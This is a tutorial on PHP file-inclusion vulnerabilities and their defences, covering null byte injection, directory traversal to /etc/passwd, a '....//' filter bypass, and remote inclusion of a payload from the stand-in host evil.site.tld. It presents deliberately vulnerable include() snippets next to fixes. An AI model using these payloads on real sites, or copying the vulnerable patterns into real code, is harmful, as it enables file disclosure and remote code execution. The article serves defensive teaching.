PHP Arbitrary File Include


A common attack vector used against web applications is to subvert the commonly used include(), include_once(), require() and require_once() functions. These functions pull a file into the currently executing script and evaluate its contents: anything inside <?php ?> tags runs as PHP code, and anything outside them is sent to the output. If an attacker can influence which file is pulled in, the result is a number of dangerous conditions that expose web applications to attack.

Suppose you're using the following common pattern in your application:

<?php
	include('header.php');
	include('pages/' . $_GET['page'] . '.php');
	include('footer.php');
?>

The idea here is that the site navigation links to various "pages" in the application by naming, in the URL, the file to be included. For instance, 'index.php?page=about' should include 'pages/about.php' and render that page.

The problem with this method is that it is fairly easy for an attacker to bypass the weak protection it imposes and include arbitrary files. One of the most commonly used techniques is null byte injection, which bypasses the concatenated '.php' file extension. The null byte is URL encoded as %00, and PHP decodes it into a real null character before the script sees it. The trick works because PHP is written in C, and C treats a null byte as the end of a string. PHP builds the full path 'pages/somename' + null byte + '.php', but the underlying filesystem call stops reading at the null byte and opens 'pages/somename', ignoring the extension altogether. (PHP 5.3.4 and later reject paths that contain a null byte, so this particular trick only works against older interpreters.) Suppose there is a .htaccess file in the 'pages/' directory, so that the contents of the directory appear thus:

pages/
	.htaccess
	about.php
	contact.php
	homepage.php
	sitemap.php

An attacker could call the URL 'index.php?page=.htaccess%00' and the contents of the .htaccess file would be included; because the file contains no PHP tags, it appears as plain text in the rendered page. Combining this attack with directory traversal allows the attacker to include any file on the filesystem that the web server can read. A common target is the '/etc/passwd' file, which enumerates the user accounts on the system. Calling the URL 'index.php?page=../../../../../etc/passwd%00' should reveal the file. The number of '../' segments needed depends on the application path, but an attacker can simply supply too many, since '..' at the filesystem root stays at the root.
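The truncation can be illustrated in userland PHP. The sketch below is not how PHP's internals are written: c_view() is a hypothetical helper that mimics a C function reading a path only up to its first null byte, as filesystem calls did before PHP 5.3.4. It assumes PHP 7 or later for the type declarations.

```php
<?php
// Sketch only: c_view() is a hypothetical helper that mimics how a C-level
// filesystem call in PHP before 5.3.4 read a path containing a null byte.
function c_view(string $path): string
{
    // C strings end at the first "\0"; strstr(..., true) returns what precedes it.
    $cut = strstr($path, "\0", true);
    return $cut === false ? $path : $cut;
}

// PHP URL-decodes query parameters, so %00 arrives as a real "\0" byte.
$page = urldecode('../../../../../etc/passwd%00');
$built = 'pages/' . $page . '.php';

// PHP itself still holds the whole string, '.php' suffix included...
var_dump(substr($built, -4));   // string(4) ".php"
// ...but the C layer only ever saw the part before the null byte.
echo c_view($built), "\n";      // pages/../../../../../etc/passwd
```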

Protecting Against Arbitrary File Include

Protecting against this type of vector is difficult. The best strategy is to limit input to "known good", meaning that one would create an array of known files and only include those files. For instance:

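<?php
	// Allowlist of page names that may be included
	$files = array('about', 'contact', 'homepage', 'sitemap');
	$page = isset($_GET['page']) ? $_GET['page'] : '';
	// Strict search so only an exact string match is accepted
	$key = array_search($page, $files, true);
	if ($key !== false) {
		// The path comes from the array entry, never from user input
		include_once('pages/' . $files[$key] . '.php');
	}
?>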

In this way the filename is produced from the array rather than from the user input. The developer, not the attacker, specifies the string to be included, and keeping user input out of the path entirely yields a more robust security posture.
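The same allowlist can also be written as an associative array that maps each public page name straight to its file, which sidesteps in_array()'s loose comparisons. This is a minimal sketch assuming PHP 7.1 or later; page_file() is a hypothetical helper name, and the file list mirrors the 'pages/' directory from the example above.

```php
<?php
// Sketch: the allowlist as an associative array mapping each public page name
// to its file on disk. page_file() is a hypothetical helper, not a PHP built-in.
function page_file($requested, array $pages): ?string
{
    // Reject anything that is not a plain string (e.g. ?page[]=x arrives as an array).
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup; the returned path comes from the array, never from user input.
    return array_key_exists($requested, $pages) ? $pages[$requested] : null;
}

$pages = [
    'about'    => 'pages/about.php',
    'contact'  => 'pages/contact.php',
    'homepage' => 'pages/homepage.php',
    'sitemap'  => 'pages/sitemap.php',
];

// In index.php one might then write:
// include(page_file($_GET['page'] ?? 'homepage', $pages) ?? $pages['homepage']);
```

Because the lookup is an exact key match, inputs such as '../../../../../etc/passwd' or '.htaccess' followed by a null byte simply return null.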

An alternative is to sanitize the user input in some way, and several built-in functions are useful for this purpose. The urlencode() function is an interesting one: it replaces every character other than letters, digits, '-', '_' and '.' (including forward slashes and the null byte) with a percent sign followed by two hexadecimal digits, and replaces spaces with '+'. Using this function in the following way:

<?php
	include('header.php');
	include('pages/' . urlencode($_GET['page']) . '.php');
	include('footer.php');
?>

Encodes an attack string such as 'index.php?page=../../../../../etc/passwd%00' and produces the following error:

Warning: include(pages/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.php) [function.include]: failed to open stream: No such file or directory
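The encoding in that warning is easy to reproduce on its own. A minimal sketch, assuming the request value has already been URL-decoded by PHP so that %00 arrives as a real null byte:

```php
<?php
// Sketch: reproduce the encoding seen in the warning, assuming the value
// was already URL-decoded by PHP (so the trailing "\0" is a real null byte).
$page = "../../../../../etc/passwd\0";
$encoded = urlencode($page);

// '/' becomes %2F and the null byte becomes the three literal characters "%00";
// '.' is one of the characters urlencode() leaves untouched.
echo 'pages/' . $encoded . '.php', "\n";
// pages/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.php
```

A plain page name such as 'about' passes through urlencode() unchanged, which is why the legitimate pages keep working.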

As you can see, the slashes are converted to %2F and the null byte becomes the literal text '%00', so neither directory traversal nor null byte string termination works. Another interesting option is the basename() function, which returns only the trailing name component of a path, discarding any directory portion. Using the code:

<?php
	include('header.php');
	include('pages/' . basename($_GET['page']) . '.php');
	include('footer.php');
?>

Defeats directory traversal: '../../../../../etc/passwd' is reduced to 'passwd', so the include stays inside the 'pages/' directory. basename() does NOT remove a null byte, however, so on PHP versions before 5.3.4 an attacker can still cut off the '.php' extension and include any non-PHP file in 'pages/', such as the .htaccess file above. That weakness could be chained with an arbitrary file upload vulnerability if uploaded files land in that directory. One strategy to close this gap is to limit input to a restricted character set using code such as:

<?php
	include('header.php');
	// Keep only ASCII letters and digits; dots, slashes and null bytes are stripped
	$page = preg_replace('/[^a-zA-Z0-9]/', '', $_GET['page']);
	include('pages/' . basename($page) . '.php'); 
	include('footer.php');
?>

As you can see, however, this is becoming increasingly complex, and every extra step raises the chance of introducing a vulnerability through error, omission or oversight.
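To make the differences concrete, the sketch below runs a few sample inputs through basename() and through a letters-and-digits filter. It also shows a common slip in that filter: inside a bracketed character class only the first '^' negates, so a pattern written as [^a-z^A-Z^0-9] treats the later carets as literal characters and lets '^' through. The sample values are illustrative, and the sketch uses only core PHP functions.

```php
<?php
// Sketch comparing the sanitizers discussed above on a few sample inputs.
// The sample values are illustrative, not taken from real attack logs.
$samples = ['about', '../../../../../etc/passwd', 'ab^out'];

foreach ($samples as $raw) {
    // basename() drops every leading directory component, so '../' cannot escape pages/.
    $viaBasename = basename($raw);
    // Intended filter: keep only ASCII letters and digits.
    $viaFilter = preg_replace('/[^a-zA-Z0-9]/', '', $raw);
    // Common slip: inside [...] only the first ^ negates; later ^ are literal carets.
    $viaSlip = preg_replace('/[^a-z^A-Z^0-9]*/', '', $raw);
    echo "$raw => basename: $viaBasename | filter: $viaFilter | slip: $viaSlip\n";
}
```

Note that the strict filter also removes dots and null bytes, which basename() leaves in place.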

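Another interesting possibility is the realpath() function in PHP. It converts a path into a canonical absolute path, collapsing every '.' and '../' segment and resolving symbolic links, and it returns false if the file does not exist. A safe way to use it is to resolve the full candidate path and then check that the result still lies inside the 'pages/' directory:

<?php
	include('header.php');
	// realpath() collapses '../' segments and symlinks; false if the file is missing
	$path = realpath('pages/' . $_GET['page'] . '.php');
	// Include only a file that exists and still lies inside pages/
	if (is_string($path) && strpos($path, realpath('pages') . DIRECTORY_SEPARATOR) === 0) {
		include($path);
	}
	include('footer.php');
?>

This defeats the attack. A malicious $_GET['page'] value of ../../../../../etc/passwd resolves to '/etc/passwd.php', which does not exist (so realpath() returns false), and even if it did exist it would fail the prefix check because it lies outside 'pages/'. Note that realpath() on its own blocks nothing: it only reports where a path really points, so the comparison against the allowed base directory is what stops directory traversal. A value carrying a null byte never reaches include() either, because PHP 5.3.4 and later refuse paths that contain one.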
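The realpath() check can be wrapped in a reusable function and exercised against a throwaway directory. This is a sketch under stated assumptions: safe_page_path() is a hypothetical helper name, it requires PHP 7.1 or later, and the usage lines create a temporary 'pages' directory purely for demonstration.

```php
<?php
// Sketch: realpath()-based containment check. safe_page_path() is a
// hypothetical helper name; $baseDir is whatever directory holds the pages.
function safe_page_path(string $baseDir, $page): ?string
{
    // Arrays and null bytes are rejected before realpath() ever sees them.
    if (!is_string($page) || strpos($page, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses '.', '..' and symlinks, and returns false if the file is missing.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Accept only paths that still sit underneath the resolved base directory.
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

// Usage: build a throwaway pages directory and probe it.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'about.php', '<?php echo "about";');

var_dump(safe_page_path($dir, 'about') !== null);            // bool(true)
var_dump(safe_page_path($dir, '../../../../../etc/passwd')); // NULL
```

Comparing against realpath() of the base directory, rather than the raw string, matters when the base directory itself sits behind a symbolic link (the system temporary directory does on some platforms). Appending DIRECTORY_SEPARATOR to the prefix also stops a sibling directory such as 'pages-old/' from passing the check.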

Beware!

Many developers build home-grown solutions to this problem rather than relying on PHP's built-in functions. Some developers will use code such as:

<?php
	include('header.php');
	include('pages/' . str_replace("../", '', ($_GET['page'])) . '.php');
	include('footer.php');
?>

While this seems like a good idea, it is easily defeated with clever URL encoding or other tricks. For instance, an attacker who uses the URL 'index.php?page=....//....//....//....//....//etc/passwd%00' completely bypasses this defense, because removing the '../' from each '....//' leaves a fresh '../' behind. A home-brew solution is always a bad idea when tackling a problem like this because it commits the developer to maintaining the code in an ever-escalating war against attackers, trying to stay one step ahead of emerging techniques. Because a lone developer is hopelessly outnumbered, it is much wiser to rely on a community-supported library or native functionality to defeat these attack vectors. Doing so offloads that development work to the community, which can produce more timely and effective defenses against the ever-evolving methods of attackers.
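The '....//' trick is easy to verify with a minimal sketch that applies the same single str_replace() pass as the code above to the attacker's value (without the trailing null byte):

```php
<?php
// Sketch: why a single str_replace() pass is not a filter. Removing "../"
// from "....//" leaves exactly one "../" behind.
$payload = '....//....//....//....//....//etc/passwd';
$filtered = str_replace('../', '', $payload);

echo $filtered, "\n"; // ../../../../../etc/passwd
```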

Another pitfall is relying on the pathinfo() function to check files for inclusion. Be aware that pathinfo() is vulnerable to null byte injection, as detailed at http://www.madirish.net/?article=232. It is still useful, but it comes with caveats.

Remote File Inclusion

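One particularly nasty variant of this attack vector is the remote file include vulnerability, in which a file fetched from a URL is included into the executing script. Since PHP 5.2.0 this requires two settings in the PHP configuration file (php.ini): allow_url_fopen, which lets file functions open URLs, and allow_url_include, which additionally lets include() and require() do so. If both are enabled like so:

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.

allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.

allow_url_include = On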

Then attackers can potentially pull PHP code hosted on remote sites into local PHP files for execution. In all of the above examples the include path is anchored by prepending 'pages/' to the include string, which will normally defeat remote file include attacks. However, if our code instead looked like this:

<?php
	include('header.php');
	include($_GET['page'] . '.php');
	include('footer.php');
?>

An attacker might be able to use a URL such as 'index.php?page=http://evil.site.tld/script.txt?'. The trailing '?' turns the appended '.php' into a harmless query string, so the request still fetches 'script.txt'. In this attack the remote server must return the PHP source as plain text rather than executing it, because the target server includes whatever the response contains and interprets it itself. This is actually more of a benefit than a hindrance to most attackers: many sites that restrict uploads to innocuous, non-interpreted formats such as HTML and plain text will happily host such a payload. Thus, if an attacker hosts the following file as 'script.txt' on 'http://evil.site.tld':

<?php phpinfo();?>

Then the file contents would be included in our example above: the header renders, then the phpinfo() function executes, and finally the footer is included. This attack is especially devastating because an attacker can include any PHP code that is served as plain text anywhere on the web. An attacker could even include pages from innocuous sites that present PHP code for demonstration purposes, provided the code is delivered unescaped, and that code would run on the target.

Conclusion

Being aware of the risk posed by file inclusion attacks is critical to deploying a safe PHP application. If remote files are not needed (as is normally the case), the PHP configuration file should set allow_url_include to 'Off', which has been the default since PHP 5.2.0; setting allow_url_fopen to 'Off' as well removes URL access from PHP's file functions entirely. This is the simplest way to defend against remote file include attacks.
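A deployment could also verify the setting at startup. A minimal sketch, assuming PHP 7 or later; remote_include_enabled() is a hypothetical helper name, and logging through error_log() is just one possible reaction:

```php
<?php
// Sketch: a startup sanity check that remote includes are switched off.
// remote_include_enabled() is a hypothetical helper name.
function remote_include_enabled(): bool
{
    // ini_get() returns the setting as a string (for example "1" or "");
    // FILTER_VALIDATE_BOOLEAN maps "1", "true", "on" and "yes" to true, anything else to false.
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remote_include_enabled()) {
    error_log('allow_url_include is On; remote file inclusion is possible.');
}
```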

Protecting against local file include vulnerabilities, including directory traversal, is fairly straightforward if the developer uses well-known, maintained PHP functions to sanitize user input. The best approach is to limit includes to "known good" values, but the dynamic nature of a site often precludes this option. In such scenarios it is critical to use community-supported, evolving libraries and functions to sanitize user input. Attempting to "roll your own" solution is undesirable because it is too easy to overlook a potential attack vector and impossible to predict future attacker methods. Using a supported library allows you to harness the power of a development community, and its responsiveness to emerging threats, simply by keeping your system patched and up to date.